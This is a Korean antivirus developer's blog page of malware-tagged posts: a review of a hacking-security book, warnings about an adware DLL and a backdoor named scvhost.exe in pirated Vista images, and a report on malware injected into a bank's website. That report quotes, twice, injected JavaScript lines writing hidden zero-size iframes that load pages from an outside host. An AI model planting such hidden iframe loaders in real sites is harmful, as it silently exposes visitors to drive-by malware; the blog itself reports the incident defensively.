이 있고, 쉬프트웍스의 VGUARD for Smartphone 씨리즈도 있답니다.
한번씩 구경해주세요
VGUARD for Android,
VGUARD for Iphone,
VGUARD for Window Mobile
3가지 모두 있습니당.
'악성코드'에 해당되는 글 6건
- 2010/04/13 안철수 연구소 V3 모바일 (1)
- 2008/07/01 [해킹 보안 서적] 와우스토리 리뷰 섹션 #1
- 2008/03/13 Icons.dll 파일이 있으면 삭제하세요~
- 2008/03/04 비사트 악성코드
- 2008/03/02 불법복제품 운영체제(OS)에 탑재된 백도어, 악성코드, 루트킷 조심!!
- 2008/02/04 하나은행 홈페이지에 악성코드 (4)
해킹 보안 책 "와우스토리 리뷰 섹션#1"
우연히 사무실에 앉아있다가 옆에 있던 "와우스토리" 라는 책이 손에 잡힌다.
물론 내가 이 책에 대해서 리뷰를 쓰는 것이 좀 그럴지 모르겠지만, 일단 난 저자가 아니기때문에
리뷰를 써보려고 한다.
우선 책은 처음 접할때 디자인이 중요한것 같은데, 디자인이 정말로 괜찮다.
와우해커 디자이너가 직접 디자인 하였는데, 일부 전문성은 조금 떨어저보이긴 하지만
디자인은 흡족하다. 표지는 http://book.sessak.com 사이트에 가면 메인에서 바로 볼수있다.
기분 좋게 책을 볼수가 있다.
또한, 목차 링크도 메인에 있다. 목차링크
표지를 보면
홍동철, 윤석언, 임병준, 신우성, 이호진, 권지연, 황성현, 박찬암, 정종강, 한승훈, 박재홍
이 와우스토리에 각 섹션 별로 내용을 넣은 글쓴이들이다.
와우해커는 멤버의 인원수가 많다 보니, 한 명씩 조금만 써도 한 권의 책이 되어버린다.
하지만 책이란것이 얼마나 쓰기 어렵고 제작 하기 어려운지 그들도 잘 알것이다.
벌써 두번째 와우스토리가 기다려진다. 두번째는 나도 한 꼭지를 맡아볼까?
종이의 질감도 상당히 좋다. 고급 재료로만 선정해서 골라서 책넘김도 좋고 오래 써도 뜯어지지
않을것 같다.
본 내용으로 들어가서
첫번째 내용
BHO
BHO는 Browser Help Object 라고 쉽게 생각할때 요즘 흔히 설치되는 보이지않는
툴바 정도로 보면 이해가 쉬울수가 있다.
이 BHO에 대해서 어떻게 구성이 되고 어떻게 탐지를 할수가 있고, 어떻게 제작이 되는지를
알아볼수있으므로 초보자부터 이런부분을 접해보지 못한 전문가들도 도움이 많이 되는 내용이다.
한편으론, 악성툴바나 광고용툴바를 제작하는 사람들 보고 회피나 혹은 제작에 참고는 하지 않을까
하는 의심도 생긴다. 책에 있는 설명을 보면 바로 이해가 쉬울것으로 판단된다.
악성코드 인코딩 디코딩
요즘 악성코드들중 웹을 통해서 전파 설치되는 악성코드들이 있다.
이런 악성코드들은 광고툴, 애드웨어라고도 한다. 앞에서 다룬 툴바의 설치, 시작페이지 변경등
자신들이 원하는 작업을 수행하기 위하여 많은 사람들이 억세스 할수있는 웹을 통해서 전파를 많이
시킨다. 주로 웹에 취약점을 통해서 전파가 되는데
백신이나 기타 보안 솔루션들에 노출이 되면 생명이 길지않기 때문에 주로 인코딩을 하여 눈으로
쉽게 코드를 읽지 못하도록 한다.
백신이나 바이러스 수집가들도 많은 요즘 현실에, 이러한 내용을 참고하면 분석에 있어서 많은
도움이 된다고 생각한다.
주로 많이 사용되는 unescape나 \ 인코딩으로 8진수나 16진수로 인코딩을 하는 내용부터
Script Encoder나 US-ASCII까지 다양한 내용들을 포함하고있다.
초보자들이 자기 자신의 컴퓨터에 의심이 되는 파일의 분석이나 안티바이러스 분야로 진출하기위하여
공부하기 위한 좋은 과목이다.
역시 초보자 부터 중급자까지 볼수있는 좋은 내용이다.
WHS, VBS를 이용한 악성코드
위 인코딩과 관련이 되는 내용으로 WHS나 VBS로 제작된 악성코드의 내용을 숨기기 위해서
인코딩을 사용하는데, 이번 장은 WHS나 VBS를 이용한 악성코드에 관한 내용응로
역시 안티바이러스 분석이나 자신의 시스템을 보호하기 위하여 기법을 알아두면 좋은 내용이다.
한편으로 요즘은 많이 차단이되거나 막히지만 이런 내용으로 악성코드를 제작함에 사용하지는
않나 하는 생각도 든다. 어디까지나 제작자의 의도가 나쁘지만 않는다면 좋은 용도로 사용하는
내용인데 악의가 조금이라도 생긴다면 바로 악성코드로 분류가 될 수 있다.
다양한 명령문으로
악성코드의 주요 포인트인 특정 파일을 시스템으로 내려서 그 파일을 실행 혹은 자기복제를
하여 원하는 목적을 달성하는 내용이다. 이에 대한 분석으로 해당 기술을 참고하여 자신의 시스템
보호나 컴퓨터를 사용할때 악성코드들이 어떻게 내 시스템에 설치가 나도 모르게 되는지 이해를
할 수가 있는 대목이다.
섹션1은 주로 악성코드나 불법 소프트웨어들이 사용하는 기법이나 기술에 관하여 이해를 하고
그에 따른 스스로의 대응이나 방어 방법을 이해할수있는 대목으로 판단이 되며, 꼭 그쪽이
아니더라도 시스템 분석에 아주 큰 도움이 되는 섹션같다.
"초보자~중고급자" 까지 커버가 가능할 듯 싶다.
다음 시간에 섹션 #2에 대한 리뷰 를 하도록 하겠다.
와우스토리는
홍테크에서 판매를 대행하고 있으며, http://book.sessak.com 에서 온라인 구매를 할 수가 있다.
와우스토리는 고급 내용을 담고 있지만, 초보자 부터 고급자까지 모두 볼 수있는 내용으로 다양한 내용을
다루는 와우해커 자체 출판으로 "한정판" 서적이다. 수익을 목적으로 하는 책이 아닌 일부 수익금을 이벤트나
두번째 와우스토리 제작을 위해서 사용을 위하여 판매되는 서적입니다.
제작 : 와우해커 (http://www.wowhacker.org)
판매 후원 : HONGTECH (http://book.sessak.com)
와우스토리 설명 페이지 : http://wowhacker.com/wowstory/153877
'AB형의 GEEK' 카테고리의 다른 글
| RealBasic 2008 (2) | 2008/07/14 |
|---|---|
| 아이팟용 어플 제작의 시작 (2) | 2008/07/14 |
| [해킹 보안 서적] 와우스토리 리뷰 섹션 #1 (0) | 2008/07/01 |
| 사무실 셋팅.. (2) | 2008/06/23 |
| 이사 가기 힘든 덩치 [바로 이전하기 기능없나?] (1) | 2008/06/18 |
| 스틸과 HD동영상 (0) | 2008/06/18 |
새싹 안티 바이러스 프로그램을 테스트 하던중 c:\windows\system32\Icons.dll을
발견하엿내요
우연히 system32에 Icons.dll 을 발견하게 되었는데요.
모 토탈 검색사이트에서 검색하면 하나도 나오지는 않아서 지울까 말까 고민중
잠시 파일을 보았습니다.
일단 이놈이
사용자의 즐겨찾기에 쇼핑몰이라는 즐겨찾기 폴더 생성을 하구요
그 안에 여러 쇼핑몰들의 리스트가 들어있습니다.
이 쇼핑몰 링크를 보면 추천인 코드(파트너 코드)가 뒤에 붙어있구요
그것을 클릭하면 파트너 코드가 들어간 사람에게 수익이 지급 되는 그러한 구조이구요
아무튼 이 Icons.dll 은 즐겨찾기에 광고를 넣는 그러한 파일입니다.
Icons.dll 을 삭제하심이~ ;)
최근 것은 아니고, 나온지는 몇달 된 듯 싶습니다.
Adware 입니다.
키워드 : 비사트 악성코드
ㅎㅎ
의도한것인가? 참고로 난 오타가 난것이다. 놀랍다
엔프로텍트만 나왔는데,,,
비사트... -> 비스타 라고 치려고했는데.
ㅎㅎ
의도한것인가? 참고로 난 오타가 난것이다. 놀랍다
엔프로텍트만 나왔는데,,,
비사트... -> 비스타 라고 치려고했는데.
'AB형의 GEEK' 카테고리의 다른 글
| 홍테크 새싹 네이버에 등록 됨 (1) | 2008/03/12 |
|---|---|
| 새싹 엔진에 관한 이야기 (3) | 2008/03/06 |
| 비사트 악성코드 (0) | 2008/03/04 |
| 무료 베타 테스트 사용자 모집 (4) | 2008/02/29 |
| 사람들을 위한, 사람들이 원하는 그런 제품 (2) | 2008/02/25 |
| 포르쉐 카이엔 GTS (Cayenne) (0) | 2008/02/25 |
아는 분께서 모 공유사이트에서 M$ 의 최신 운영체제 비스타 다운로드 받고..
모 공유사이트에서 M$ 의 최신 운영체제를
다운로드 받아서 설치했는데 이상하게 컴퓨터가 느리고, 이상하다고 한다
새로 깔아도 새로 깔아도,,
혹시 그 배포본에 문제가 있는 것은 아닐까?
역시나 그 배포본에 문제가 있었다.
델에서 OEM인증을 한 배포본 이었는데, <조심할것>
얼티메잇트 버전이며, 공유사이트에서 다운로드 받고 바로 설치하고
드라이버스 밑에 백도어가 하나 돌아가고 있었다.
이름하곤 기가 막히게 지었다. scvhost.exe ㅋㅋ 햇갈림..
정상적은 svchost 아니던가..
항상 생각하는것이지만 역시.. 똑똑들 하시나 악성코드 배포하는 사람들.
그 분께 자랑하고자 새싹 안티 바이러스에 그 부분을 넣어서 삭제 하는 것을 보여주면서
나름 새싹 안티 바이러스도 자랑도 좀했는데..
여하튼 놀란건,, 어찌 배포되는 운영체제 이미지에 저런것을 넣어 두었단 말인가?
물론 다운받아서 사용하는 사람도 불법이긴 하지만 그런것을 노려서
악성코드나 백도어를 심는 악성분자들은 양심도 없나보다,
그리 배포되면 자기 가족들이나 친구들도 사용할터인데 말이다.
물론 악성분자들도 먹고살아야하니 그런일을 저질렀겠지만,,, 그 누가 되었던..
남에게 피해를 주면서 살면 안되는데 말이야~~
여기까지 새싹사람들 이야기....
p.s) 스타크레프트 광인가보다.. SCV 가들어간거 보니...
모 공유사이트에서 M$ 의 최신 운영체제를
다운로드 받아서 설치했는데 이상하게 컴퓨터가 느리고, 이상하다고 한다
새로 깔아도 새로 깔아도,,
혹시 그 배포본에 문제가 있는 것은 아닐까?
역시나 그 배포본에 문제가 있었다.
델에서 OEM인증을 한 배포본 이었는데, <조심할것>
얼티메잇트 버전이며, 공유사이트에서 다운로드 받고 바로 설치하고
드라이버스 밑에 백도어가 하나 돌아가고 있었다.
이름하곤 기가 막히게 지었다. scvhost.exe ㅋㅋ 햇갈림..
정상적은 svchost 아니던가..
항상 생각하는것이지만 역시.. 똑똑들 하시나 악성코드 배포하는 사람들.
Sessak Test
그 분께 자랑하고자 새싹 안티 바이러스에 그 부분을 넣어서 삭제 하는 것을 보여주면서
나름 새싹 안티 바이러스도 자랑도 좀했는데..
여하튼 놀란건,, 어찌 배포되는 운영체제 이미지에 저런것을 넣어 두었단 말인가?
물론 다운받아서 사용하는 사람도 불법이긴 하지만 그런것을 노려서
악성코드나 백도어를 심는 악성분자들은 양심도 없나보다,
그리 배포되면 자기 가족들이나 친구들도 사용할터인데 말이다.
물론 악성분자들도 먹고살아야하니 그런일을 저질렀겠지만,,, 그 누가 되었던..
남에게 피해를 주면서 살면 안되는데 말이야~~
여기까지 새싹사람들 이야기....
p.s) 스타크레프트 광인가보다.. SCV 가들어간거 보니...
'시스템/IT/탐나는정보들' 카테고리의 다른 글
| Sessak Anti Virus 무료베타2 공개 (2) | 2008/03/11 |
|---|---|
| 코엑스 아쿠아리움 사이트에 바이러스 (악성코드 인젝션) (2) | 2008/03/02 |
| 불법복제품 운영체제(OS)에 탑재된 백도어, 악성코드, 루트킷 조심!! (0) | 2008/03/02 |
| 새싹 백신 무료 베타 테스트 (0) | 2008/02/29 |
| 실시간 치료 및 커널 루트킷 제거 안티바이러스 백신 베타테스터 모집 (0) | 2008/02/29 |
| 웹로그 분석 [아파치 웹로그] (0) | 2008/02/18 |
TAG malware,
svchost.exe,
Vista,
Vista Image,
루트킷,
백도어,
불법 배포 비스타 악성코드,
불법배포 비스타,
불법복제OS 백도어,
불법복제품,
비스타 다운로드,
비스타정품,
악성코드
엇그제 하나은행 홈페이지에 악성코드가 심어져있다라는 글을 남긴적이 있다.
http://www.carstory.co.kr/468
아직도 그대로 방치되고 있고, 현재는 실시간에도 걸리지 않는다.
그리고 몇일 후 인데, 현재 그 악성코드 심어놓은것에 대한 패턴을 바꾸어서
N사의 실시간 탐지에도 걸리지 않고, 웹상에 그대로 방치가 되고 있다.
ocument.write("<iframe width=0 height=0 src=http://news.max3gp.com/news.htm></iframe>");
document.write("<iframe width=0 height=0 src=http://news.max3gp.com/rss.htm></iframe>");
document.write("<iframe width='0' height='0' src='http://news.max3gp.com/dd.htm'></iframe>");
~
하나은행 홈페이지에서 css.js 로 연결이 되어 눈속임으로 처리하였고
위 내용으로 되어져 있는걸 보면, 저 코드 삽입자가 주소를 바꾸고 코드를
수정한것을 알수가 있다.
참고로 news.htm의 코드
코드 내용은 몇일전 포스팅한 내용의 거의 유사하다
http://www.carstory.co.kr/468 참고하길
http://www.carstory.co.kr/468
아직도 그대로 방치되고 있고, 현재는 실시간에도 걸리지 않는다.
그리고 몇일 후 인데, 현재 그 악성코드 심어놓은것에 대한 패턴을 바꾸어서
N사의 실시간 탐지에도 걸리지 않고, 웹상에 그대로 방치가 되고 있다.
ocument.write("<iframe width=0 height=0 src=http://news.max3gp.com/news.htm></iframe>");
document.write("<iframe width=0 height=0 src=http://news.max3gp.com/rss.htm></iframe>");
document.write("<iframe width='0' height='0' src='http://news.max3gp.com/dd.htm'></iframe>");
~
하나은행 홈페이지에서 css.js 로 연결이 되어 눈속임으로 처리하였고
위 내용으로 되어져 있는걸 보면, 저 코드 삽입자가 주소를 바꾸고 코드를
수정한것을 알수가 있다.
참고로 news.htm의 코드
코드 내용은 몇일전 포스팅한 내용의 거의 유사하다
http://www.carstory.co.kr/468 참고하길
'시스템/IT/탐나는정보들' 카테고리의 다른 글
| 가지고 싶은 시스템 또하나요~ (1) | 2008/02/15 |
|---|---|
| 커널모듈을 통한 vmsplice() local root exploit 취약점에 대한 방어 모듈 (4) | 2008/02/11 |
| 하나은행 홈페이지에 악성코드 (4) | 2008/02/04 |
| 하나은행 인터넷 뱅킹 홈페이지에 악성코드가? (5) | 2008/02/02 |
| 다시 리눅스로... (0) | 2008/01/19 |
| 모토로라 휴대폰 암호해독 (4) | 2008/01/14 |
